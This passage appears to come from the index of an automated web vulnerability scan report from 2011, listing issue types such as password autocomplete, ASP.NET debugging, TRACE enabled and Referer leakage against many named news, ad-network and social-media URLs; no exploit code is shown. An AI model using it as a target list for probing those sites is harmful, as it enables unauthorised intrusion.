14.93. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-left.png

14.94. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-right.png

14.95. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif

14.96. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif

14.97. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif

14.98. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber.gif

14.99. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber_circle.gif

14.100. http://sitelife.usatoday.com/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif

14.101. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif

14.102. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif

14.103. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif

14.104. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif

14.105. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif

14.106. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif

14.107. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif

14.108. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif

14.109. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif

14.110. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif

14.111. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif

14.112. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif

14.113. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif

14.114. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif

14.115. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/checkplayer.js

14.116. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flXHR.js

14.117. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flensed.js

14.118. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js

14.119. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js

14.120. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/swfobject.js

14.121. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/pluckApps.js

14.122. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

14.123. http://sitelife.usatoday.com/ver1.0/content/ua/css/pluckAll.css

14.124. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

14.125. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

14.126. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

14.127. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard

14.128. http://statse.webtrendslive.com/dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif

14.129. http://sync.adap.tv/sync

14.130. http://sync.mathtag.com/sync/img

14.131. http://tacoda.at.atwola.com/rtx/r.js

14.132. http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee

14.133. http://tags.bluekai.com/site/2964

14.134. http://tags.bluekai.com/site/38

14.135. http://tags.bluekai.com/site/4449

14.136. http://tags.bluekai.com/site/450

14.137. http://tags.bluekai.com/site/4592

14.138. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

14.139. http://tu.connect.wunderloop.net/TU/1/1/1/

14.140. http://tu.connect.wunderloop.net/TU2/1/1/1/

14.141. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954

14.142. http://www.bizographics.com/collect/

14.143. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx

14.144. http://www.cars.com/go/advice/index.jsp

14.145. http://www.cars.com/go/advice/shopping/cpo/index.jsp

14.146. http://www.cars.com/go/kbb/kbbInput.jsp

14.147. http://www.cars.com/go/photogalleries/index.jsp

14.148. http://www.cars.com/go/search/advanced_search.jsp

14.149. http://www.cars.com/images/bttncapOrngR.gif

14.150. http://www.cars.com/images/long_back_orng.gif

14.151. http://www.cars.com/includes/js/makemodels-used.js

14.152. http://www.cars.com/includes/js/used-car-widget_driver.js

14.153. http://www.cars.com/test/widget/Custom/carslogo71x34.jpg

14.154. http://www.myspace.com/Modules/PostTo/Pages/

14.155. http://www.nbcudigitaladops.com/favicon.ico

14.156. http://www.newslibrary.com/nlsearch.asp

14.157. http://www.sacbee.com/reg_js/access_check.js

14.158. http://www.wtp101.com/pull_sync

14.159. http://www.youtube.com/results

15. Password field with autocomplete enabled

15.1. http://digg.com/submit

15.2. https://login.yahoo.com/config/login

15.3. http://slashdot.org/bookmark.pl

15.4. http://slashdot.org/bookmark.pl

15.5. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

15.6. http://www.ispsports.com/radio-network-affiliates.cfm

15.7. https://www.linkedin.com/secure/login

15.8. http://www.outbrain.com/privacy

15.9. http://www.sacbee.com/reg-bin/int.cgi

15.10. http://www.sacbee.com/reg-bin/int.cgi

15.11. https://www.sprint.net/

15.12. https://www.sprint.net/

15.13. https://www.sprint.net/index.php

15.14. https://www.sprint.net/index.php

15.15. http://www.thatsracin.com/reg-bin/int.cgi

15.16. http://www.thatsracin.com/reg-bin/int.cgi

15.17. http://www.thatsracin.com/reg-bin/int.cgi

16. Source code disclosure

17. ASP.NET debugging enabled

17.1. http://my.textcaster.com/Default.aspx

17.2. http://stockscreener.us.reuters.com/Default.aspx

17.3. http://usata1.gcion.com/Default.aspx

17.4. http://www.wisdomtree.com/Default.aspx

18. Referer-dependent response

18.1. http://c.brightcove.com/services/viewer/federated_f9

18.2. http://www.facebook.com/plugins/like.php

18.3. http://www.facebook.com/plugins/likebox.php

18.4. http://www.facebook.com/plugins/recommendations.php

19. Cross-domain POST

19.1. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

19.2. http://www.cars.com/go/advice/index.jsp

19.3. http://www.cars.com/go/crp/index.jsp

19.4. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html

20. Cross-domain Referer leakage

20.1. http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY

20.2. http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY

20.3. http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY

20.4. http://ad.doubleclick.net/adj/mi.clt00/Sports

20.5. http://ad.doubleclick.net/adj/mi.clt00/Sports

20.6. http://ad.doubleclick.net/adj/mi.sac00/Lifestyle

20.7. http://ad.doubleclick.net/adj/mi.sac00/Lifestyle

20.8. http://admeld.adnxs.com/usersync

20.9. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx

20.10. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5

20.11. http://anrtx.tacoda.net/rtx/r.js

20.12. http://cm.g.doubleclick.net/pixel

20.13. http://cm.g.doubleclick.net/pixel

20.14. http://cm.npc-mcclatchy.overture.com/js_1_0/

20.15. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

20.16. http://googleads.g.doubleclick.net/pagead/ads

20.17. http://imp.fetchback.com/serve/fb/imp

20.18. http://pixel.invitemedia.com/admeld_sync

20.19. http://rtq.careerbuilder.com/RTQ/jobstream.aspx

20.20. http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html

20.21. http://www.facebook.com/plugins/likebox.php

20.22. http://www.facebook.com/plugins/recommendations.php

20.23. http://www.google.com/search

20.24. http://www.google.com/trends/hottrends

20.25. http://www.google.com/trends/hottrends

20.26. http://www.google.com/trends/hottrends

20.27. http://www.google.com/trends/hottrends

20.28. http://www.google.com/trends/hottrends

20.29. http://www.google.com/trends/hottrends

20.30. http://www.reuters.com/assets/commentsChild

21. Cross-domain script include

21.1. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5

21.2. http://cdn.optmd.com/V2/89733/235451/index.html

21.3. http://charlotteobserver.adperfect.com/

21.4. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

21.5. http://delivery.sprint.com/m/p/nxt/reg/cmb/generic.asp

21.6. http://digg.com/submit

21.7. http://grfx.cstv.com/scripts/oas-omni-controls.js

21.8. http://itunes.apple.com/us/app/the-sacramento-bee-for-ipad/id446757012

21.9. https://login.yahoo.com/config/login

21.10. http://notredame-hospitality.cbscollegestore.com/store.cfm

21.11. https://observ.subscribeobserver.com/

21.12. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

21.13. http://s3.cinesport.com/app_v2/csprt_player.js

21.14. http://s3.cinesport.com/players/charlotteobservergeneric.html

21.15. http://sacramentoconnect.sacbee.com/

21.16. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

21.17. http://slashdot.org/bookmark.pl

21.18. http://stockscreener.us.reuters.com/Stock/US/Index

21.19. http://und.cbscollegestore.com/store.cfm

21.20. http://und.cbscollegestore.com/store_contents.cfm

21.21. http://www.bayareasearchengineacademy.org/blog/

21.22. http://www.careerbuilder.com/

21.23. http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx

21.24. http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx

21.25. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx

21.26. http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx

21.27. http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx

21.28. http://www.cars.com/go/advice/index.jsp

21.29. http://www.cars.com/go/advice/shopping/cpo/index.jsp

21.30. http://www.cars.com/go/crp/index.jsp

21.31. http://www.cars.com/go/kbb/kbbInput.jsp

21.32. http://www.cars.com/go/photogalleries/index.jsp

21.33. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html

21.34. http://www.charlotteobserver.com/advertising/index.html

21.35. http://www.charlotteobserver.com/newsroom/index.html

21.36. http://www.facebook.com/plugins/likebox.php

21.37. http://www.facebook.com/plugins/likebox.php

21.38. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

21.39. http://www.freep.com/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football

21.40. http://www.goutsa.com/ViewArticle.dbml

21.41. http://www.greenbiz.com/

21.42. http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story

21.43. http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903

21.44. http://www.reuters.com/assets/commentsChild

21.45. http://www.reuters.com/assets/newsFlash

21.46. http://www.reuters.com/assets/print

21.47. http://www.reuters.com/do/emailArticle

21.48. http://www.reuters.com/finance/markets/index

21.49. http://www.reuters.com/news/archive/topNews

21.50. http://www.reuters.com/news/pictures/slideshow

21.51. http://www.reuters.com/news/video

21.52. http://www.reuters.com/video/2011/06/08/dramatic-video-captures-toronto-lightnin

21.53. http://www.reuters.com/video/2011/08/08/england-football-friendly-cancelled-afte

21.54. http://www.reuters.com/video/2011/08/15/football-gains-level-playing-field

21.55. http://www.reuters.com/video/2011/08/18/lockheed-martin-presents-airship-of-the

21.56. http://www.reuters.com/video/2011/08/22/buenos-aires-fashion-week-sizzles

21.57. http://www.reuters.com/video/2011/08/26/experimental-plane-reaches-13000-mph

21.58. http://www.reuters.com/video/2011/09/02/job-angst-disrupts-stock-market

21.59. http://www.reuters.com/video/2011/09/02/job-seeker-finds-job-in-tough-times

21.60. http://www.reuters.com/video/2011/09/03/cias-close-links-with-gaddafi-revealed

21.61. http://www.reuters.com/video/2011/09/03/dsk-departs

21.62. http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html

21.63. http://www.sacbee.com/classified-ads/Obituaries%20&%20In%20Memoriams/classification/In%20Memoriams

21.64. http://www.sacbee.com/mr/b.gif

21.65. http://www.sacbee.com/mr/e.gif

21.66. http://www.sacbee.com/mr/f.gif

21.67. http://www.sacbee.com/reg-bin/int.cgi

21.68. http://www.sacbee.com/reg-bin/tint.cgi

21.69. https://www.sprint.net/

21.70. https://www.sprint.net/index.php

21.71. http://www.stumbleupon.com/submit

21.72. http://www.thatsracin.com/reg-bin/int.cgi

21.73. http://www.tsn.ca/ncaa/story/

21.74. http://www.und.com/allaccess/

21.75. http://www.und.com/sports/m-footbl/9873956

21.76. http://www.und.com/sports/m-footbl/9874134

21.77. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html

21.78. http://www.usatoday.com/community/profile.htm

21.79. http://www.usatoday.com/marketing/feedback.htm

21.80. http://www.usatoday.com/marketing/questions.htm

21.81. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html

21.82. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

21.83. http://www.youtube.com/results

22. File upload functionality

23. TRACE method is enabled

23.1. http://anrtx.tacoda.net/

23.2. http://bh.contextweb.com/

23.3. http://blogs.reuters.com/

23.4. http://clk.fetchback.com/

23.5. http://digg.com/

23.6. http://dw.com.com/

23.7. http://image2.pubmatic.com/

23.8. http://imp.fetchback.com/

23.9. http://legolas.nexac.com/

23.10. http://log.c12s.com/

23.11. http://matcher-rbc.bidder7.mookie1.com/

23.12. https://observ.subscribeobserver.com/

23.13. http://optimized-by.rubiconproject.com/

23.14. http://outbrain.com/

23.15. http://picasaweb.google.com/

23.16. http://pixel.rubiconproject.com/

23.17. http://r.openx.net/

23.18. http://rt.legolas-media.com/

23.19. http://sacramentoconnect.sacbee.com/

23.20. http://search.spotxchange.com/

23.21. http://shop.sprint.com/

23.22. http://tacoda.at.atwola.com/

23.23. http://tap.rubiconproject.com/

23.24. http://www.greenbiz.com/

23.25. http://www.idg.com/

23.26. http://www.newslibrary.com/

23.27. http://www.outbrain.com/

23.28. http://www.sprint.com/

23.29. https://www.sprint.net/

23.30. http://www.stumbleupon.com/

24. Email addresses disclosed

24.1. http://cdn.echoenabled.com/clientapps/v2/stream.js

24.2. http://cdn.taboolasyndication.com/libtrc/reuters/rbox.en.4-8-2-1-48560.json

24.3. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

24.4. http://i.usatoday.net/asp/uas3/uas.jquery.plugins.js

24.5. https://login.yahoo.com/config/login

24.6. http://media.charlotteobserver.com/static/scripts/mi/utility_lib.js

24.7. http://odb.outbrain.com/utils/get

24.8. https://subscriberservices.mcclatchy.com/char/transactiontype.asp

24.9. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html

24.10. http://www.charlotteobserver.com/advertising/index.html

24.11. http://www.freep.com/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football

24.12. http://www.google.com/trends/hottrends

24.13. http://www.idg.com/www/rd.nsf/rd

24.14. http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story

24.15. http://www.newslibrary.com/nlsearch.asp

24.16. http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html

24.17. http://www.sacbee.com/classified-ads/Obituaries%20&%20In%20Memoriams/classification/In%20Memoriams

24.18. http://www.sacbee.com/mr/b.gif

24.19. http://www.sacbee.com/mr/e.gif

24.20. http://www.sacbee.com/mr/f.gif

24.21. http://www.sacbee.com/reg-bin/int.cgi

24.22. http://www.sacbee.com/reg-bin/tint.cgi

24.23. http://www.sprint.com/assets/scripts/analytics/voc/surveyLogic.js

24.24. http://www.sprint.com/legal/agreement.html

24.25. http://www.sprint.com/legal/copyright.html

24.26. http://www.usatoday.com/marketing/feedback.htm

24.27. http://www.usatoday.com/marketing/questions.htm

25. Private IP addresses disclosed

25.1. http://developers.facebook.com/plugins/

25.2. http://digg.com/submit

25.3. http://external.ak.fbcdn.net/safe_image.php

25.4. http://external.ak.fbcdn.net/safe_image.php

25.5. http://external.ak.fbcdn.net/safe_image.php

25.6. http://external.ak.fbcdn.net/safe_image.php

25.7. http://external.ak.fbcdn.net/safe_image.php

25.8. http://external.ak.fbcdn.net/safe_image.php

25.9. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.10. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.11. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/6buK9-Tz27V.js

25.12. http://www.facebook.com/campaign/landing.php

25.13. http://www.facebook.com/extern/login_status.php

25.14. http://www.facebook.com/extern/login_status.php

25.15. http://www.facebook.com/extern/login_status.php

25.16. http://www.facebook.com/extern/login_status.php

25.17. http://www.facebook.com/extern/login_status.php

25.18. http://www.facebook.com/home.php

25.19. http://www.facebook.com/plugins/like.php

25.20. http://www.facebook.com/plugins/like.php

25.21. http://www.facebook.com/plugins/like.php

25.22. http://www.facebook.com/plugins/like.php

25.23. http://www.facebook.com/plugins/like.php

25.24. http://www.facebook.com/plugins/like.php

25.25. http://www.facebook.com/plugins/likebox.php

25.26. http://www.facebook.com/plugins/likebox.php

25.27. http://www.facebook.com/plugins/recommendations.php

25.28. http://www.facebook.com/plugins/recommendations.php

25.29. http://www.facebook.com/share.php

25.30. http://www.facebook.com/sharer.php

25.31. http://www.goutsa.com/ViewArticle.dbml

26. Robots.txt file

26.1. http://206537.r.msn.com/

26.2. http://243973.r.msn.com/

26.3. http://943042.r.msn.com/

26.4. http://a.tribalfusion.com/j.ad

26.5. http://ad.afy11.net/ad

26.6. http://ad.doubleclick.net/adj/N763.usatoday.comOX3622/B5770010.6

26.7. http://ad.turn.com/server/pixel.htm

26.8. http://ad.yieldmanager.com/pixel

26.9. http://ads.undertone.com/ajs.php

26.10. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5

26.11. http://api.affinesystems.com/event/impression

26.12. http://api.bizographics.com/v1/profile.redirect

26.13. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

26.14. http://ar.atwola.com/atd

26.15. http://as.casalemedia.com/s

26.16. http://b.scorecardresearch.com/b

26.17. http://blogs.reuters.com/wp-content/widgets/rtrxtra/rac.php

26.18. http://bookmarks.yahoo.com/myresults/bookmarklet

26.19. http://c.brightcove.com/services/viewer/federated_f9

26.20. http://c5.zedo.com/ads2/f/722607/3840/0/0/305000825/305000825/0/305/263/zz-V1-pop1304968607137.html

26.21. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

26.22. http://cdn.gigya.com/js/socialize.js

26.23. http://cdn.optmd.com/V2/89733/235451/index.html

26.24. http://cdn.turn.com/server/ddc.htm

26.25. https://cdns.gigya.com/gs/SafariIDsProxy.htm

26.26. http://charlotteobserver.adperfect.com/

26.27. http://clk.fetchback.com/serve/fb/click

26.28. http://cm.g.doubleclick.net/pixel

26.29. http://cm.npc-mcclatchy.overture.com/js_1_0/

26.30. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

26.31. http://delivery.sprint.com/m/p/nxt/reg/cmb/generic.asp

26.32. http://digg.com/submit

26.33. https://docs.google.com/

26.34. http://dw.com.com/clear/c.gif

26.35. http://espn.go.com/dallas/ncf/preview

26.36. http://feedburner.google.com/fb/a/mailverify

26.37. http://findnsave.sacbee.com/api/groupon.json

26.38. http://friendfeed.com/share

26.39. http://funds.reuters.com/lipper/retail/reuters/overview.asp

26.40. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

26.41. https://google.com/accounts/Logout

26.42. http://googleads.g.doubleclick.net/aclk

26.43. http://groups.google.com/groups

26.44. http://images.google.com/support/bin/answer.py

26.45. http://imp.fetchback.com/serve/fb/adtag.js

26.46. http://itunes.apple.com/us/app/the-sacramento-bee-for-ipad/id446757012

26.47. http://jlinks.industrybrains.com/jsct

26.48. http://l.addthiscdn.com/live/t00/250lo.gif

26.49. http://legolas.nexac.com/lgalt

26.50. http://links.industrybrains.com/click

26.51. http://load.exelator.com/crossdomain.xml

26.52. https://mail.google.com/mail/

26.53. https://maps-api-ssl.google.com/maps

26.54. http://maps.google.com/maps

26.55. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s88955233080778

26.56. http://news.google.com/news/story

26.57. http://nextelonline.nextel.com/tl/set_tl.html

26.58. http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516

26.59. http://notredame-hospitality.cbscollegestore.com/store.cfm

26.60. http://ocp.ncaa.com/adFunctions.js

26.61. http://odb.outbrain.com/utils/get

26.62. http://pagead2.googlesyndication.com/pagead/imgad

26.63. http://paid.outbrain.com/network/redir

26.64. http://pbid.pro-market.net/crossdomain.xml

26.65. http://picasaweb.google.com/lh/view

26.66. http://pixel.invitemedia.com/admeld_sync

26.67. http://pixel.quantserve.com/seg/r

26.68. http://premium.mookie1.com/2/nbc.com/ac@Bottom3

26.69. http://pubads.g.doubleclick.net/gampad/ads

26.70. http://r.turn.com/server/pixel.htm

26.71. http://rd.rlcdn.com/rd

26.72. http://rt.legolas-media.com/lgrt

26.73. http://rtq.careerbuilder.com/RTQ/jobstream.aspx

26.74. http://s0.2mdn.net/1181183/espn_cfb_728x90_sn_main.swf

26.75. http://sacramentoconnect.sacbee.com/

26.76. http://safebrowsing.clients.google.com/safebrowsing/gethash

26.77. http://scholar.google.com/scholar

26.78. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

26.79. http://search.charlotteobserver.com/search-bin/search.pl.cgi

26.80. http://search.spotxchange.com/partner

26.81. http://search2.sacbee.com/search-bin/search.pl.cgi

26.82. http://shlinks.industrybrains.com/sh

26.83. http://shop2.sprint.com/assets/olsvideo/mediaPlayer.html

26.84. http://shopping.sacbee.com/ROP/Subcat.aspx

26.85. http://simg.zedo.com/speed-test/10k.gif

26.86. https://sites.google.com/

26.87. http://slashdot.org/bookmark.pl

26.88. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard

26.89. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.90. http://store.cstv.com/marketplace/store.cfm

26.91. http://sync.mathtag.com/sync/img

26.92. http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee

26.93. http://tcr.tynt.com/javascripts/Tracer.js

26.94. http://traffic.outbrain.com/network/redir

26.95. http://translate.google.com/

26.96. http://trc.taboolasyndication.com/reuters/log/2/debug

26.97. http://tu.connect.wunderloop.net/TU/1/1/1/

26.98. http://twitter.com/home

26.99. http://und.cbscollegestore.com/store.cfm

26.100. http://und.cstvauctions.com/auctiondisplay.cfm

26.101. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954

26.102. http://webcache.googleusercontent.com/search

26.103. http://www.bayareasearchengineacademy.org/blog/

26.104. http://www.bizographics.com/collect/

26.105. http://www.careerbuilder.com/share/login.aspx

26.106. http://www.cars.com/go/crp/index.jsp

26.107. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html

26.108. http://www.facebook.com/plugins/like.php

26.109. http://www.fmglobal.com/default.aspx

26.110. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

26.111. http://www.freep.com/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football

26.112. http://www.google-analytics.com/__utm.gif

26.113. http://www.google.com/trends

26.114. http://www.googleadservices.com/pagead/conversion/1031221371/

26.115. http://www.greenbiz.com/

26.116. http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story

26.117. http://www.linkedin.com/countserv/count/share

26.118. https://www.linkedin.com/secure/login

26.119. http://www.myspace.com/Modules/PostTo/Pages/

26.120. http://www.nbcudigitaladops.com/hosted/util/setRemoteDomainCookies.html

26.121. http://www.newslibrary.com/nlsearch.asp

26.122. http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903

26.123. http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html

26.124. http://www.sologig.com/

26.125. http://www.sprint.com/

26.126. https://www.sprint.net/

26.127. http://www.stumbleupon.com/submit

26.128. http://www.thatsracin.com/reg-bin/int.cgi

26.129. http://www.traffic.com/Charlotte-Traffic/Charlotte-Traffic-Map.html

26.130. http://www.tsn.ca/ncaa/story/

26.131. http://www.tulsaworld.com/site/articlepath.aspx

26.132. http://www.tumblr.com/share

26.133. http://www.usatoday.com/community/profile.htm

26.134. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html

26.135. http://www.wunderground.com/auto/sacbeeXML/geo/WXCurrentObXML/index.xml

26.136. http://www.youtube.com/results

26.137. http://www.zvents.com/images/internal/5/6/5/2/img_13432565_thumb.jpg

27. Cacheable HTTPS response

27.1. https://cdns.gigya.com/gs/SafariIDsProxy.htm

27.2. https://maps-api-ssl.google.com/maps

27.3. https://observ.subscribeobserver.com/

27.4. https://socialize.gigya.com/gs/bookmark.aspx

27.5. https://subscriberservices.mcclatchy.com/char/transactiontype.asp

27.6. https://www.sprint.net/

27.7. https://www.sprint.net/external_videos/pages.php

27.8. https://www.sprint.net/index.php

28. HTML does not specify charset

28.1. http://a.lingospot.com/pv_error/

28.2. http://a.tribalfusion.com/j.ad

28.3. http://ad.doubleclick.net/clk

28.4. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5

28.5. http://api.js-kit.com/v1/count

28.6. http://c.brightcove.com/services/messagebroker/amf

28.7. http://c5.zedo.com/ads2/f/722607/3840/0/0/305000825/305000825/0/305/263/zz-V1-pop1304968607137.html

28.8. https://cdns.gigya.com/gs/SafariIDsProxy.htm

28.9. http://content.usatoday.com/asp/uas3/uasSignedOut.htm

28.10. http://content.usatoday.com/quickquestion/jquery/1.0.1.html

28.11. http://cti.w55c.net/ct/rubicon-cms2.html

28.12. http://grfx.cstv.com/schools/nd/data/xml/auctions/m-footbl.xml

28.13. http://grfx.cstv.com/schools/nd/graphics/nd-09-bsi-video.jpg

28.14. http://grfx.cstv.com/schools/nd/graphics/nd-09-btn-bsi-.gif

28.15. http://grfx.cstv.com/schools/nd/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

28.16. http://l1.zedo.com/log/p.html

28.17. http://links.industrybrains.com/click

28.18. http://nextelonline.nextel.com/tl/set_tl.html

28.19. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

28.20. http://pbid.pro-market.net/engine

28.21. http://pixel.quantserve.com/seg/r

28.22. http://premium.mookie1.com/2/nbc.com/ac@Bottom3

28.23. http://shop2.sprint.com/assets/olsvideo/mediaPlayer.html

28.24. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

28.25. https://subscriberservices.mcclatchy.com/char/transactiontype.asp

28.26. http://video.od.visiblemeasures.com/log

28.27. http://www.charlotteobserver.com/search/

28.28. http://www.nbcudigitaladops.com/hosted/util/setRemoteDomainCookies.html

28.29. http://www.newslibrary.com/nlsearch.asp

28.30. http://www.reuters.com/resources/r/

28.31. http://www.usatoday.com/community/profile.htm

28.32. http://www.usatoday.com/marketing/feedback.htm

28.33. http://www.usatoday.com/marketing/questions.htm

29. Content type incorrectly stated

29.1. http://ad.doubleclick.net/clk

29.2. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5

29.3. http://blogs.reuters.com/wp-content/widgets/rtrxtra/rac.php

29.4. http://cdn.taboolasyndication.com/libtrc/reuters/rbox.en.4-8-2-1-48560.json

29.5. http://d3fd89.r.axf8.net/mr/e.gif

29.6. http://espn.go.com/dallas/ncf/preview

29.7. http://goku.brightcove.com/1pix.gif

29.8. http://imp.fetchback.com/serve/fb/adtag.js

29.9. http://js.www.reuters.com/recommend/re/fp

29.10. http://media.charlotteobserver.com/static/dealsaver/widget/images/dealsaver_td_logo.png

29.11. http://mediacdn.disqus.com/1314991730/fonts/disqus-webfont.woff

29.12. http://rt.disqus.com/forums/realtime-cached.js

29.13. http://rt.legolas-media.com/lgrt

29.14. http://rtq.careerbuilder.com/RTQ/jobstream.aspx

29.15. http://search.charlotteobserver.com/search-bin/search.pl.cgi

29.16. http://search2.sacbee.com/search-bin/search.pl.cgi

29.17. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

29.18. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

29.19. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard

29.20. http://static.mcclatchyinteractive.com/creative/fns/widgets/images/deal_placeholder.jpg

29.21. http://trc.taboolasyndication.com/reuters/trc/2/json

29.22. http://urls.api.twitter.com/1/urls/count.json

29.23. http://video.od.visiblemeasures.com/log

29.24. http://www.facebook.com/extern/login_status.php

29.25. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js

29.26. http://www.reuters.com/assets/breakingNews

29.27. http://www.reuters.com/assets/info

29.28. http://www.reuters.com/assets/searchIntercept

29.29. http://www.reuters.com/assets/sharedModuleLoader

29.30. http://www.reuters.com/resources/r/

29.31. http://www.sprint.com/favicon.ico

29.32. http://www.wunderground.com/auto/sacbeeXML/geo/WXCurrentObXML/index.xml

30. Content type is not specified

30.1. http://load.tubemogul.com/core

30.2. http://pcm3.map.pulsemgr.com/uds/pc



1. SQL injection
